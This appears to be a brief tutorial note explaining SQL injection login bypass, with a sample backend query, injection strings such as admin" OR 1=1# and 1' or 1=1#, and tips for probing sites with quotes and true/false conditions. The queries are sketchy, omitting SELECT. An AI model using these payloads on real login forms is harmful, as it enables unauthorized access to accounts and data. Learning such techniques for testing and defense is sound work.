On Login Page the value for username and password is controlled by the user

-- Backend Query Sample
FROM login 
WHERE username="$USERNAME" AND password="$PASSWORD"; 

We can enter the values as admin" or "1"="1 which forms valid SQL query 1=1 is always true and the OR clause nullifies the WHERE statement

FROM login 
WHERE username="admin" OR "1"="1" AND password="admin" OR "1"="1";

# is considered as comment in MySQL. So second half off query is ignored

FROM login 
WHERE username="admin" OR 1=1#" and password="admin";

Depending on DB being used different types of comments can be used For string values ” or ’ will be used depending on DB If the input field only takes numbers then 1' or 1=1# can be used Not all websites is going to produce error so play around with ’, and, or (True and False) statements are check if desired output is produced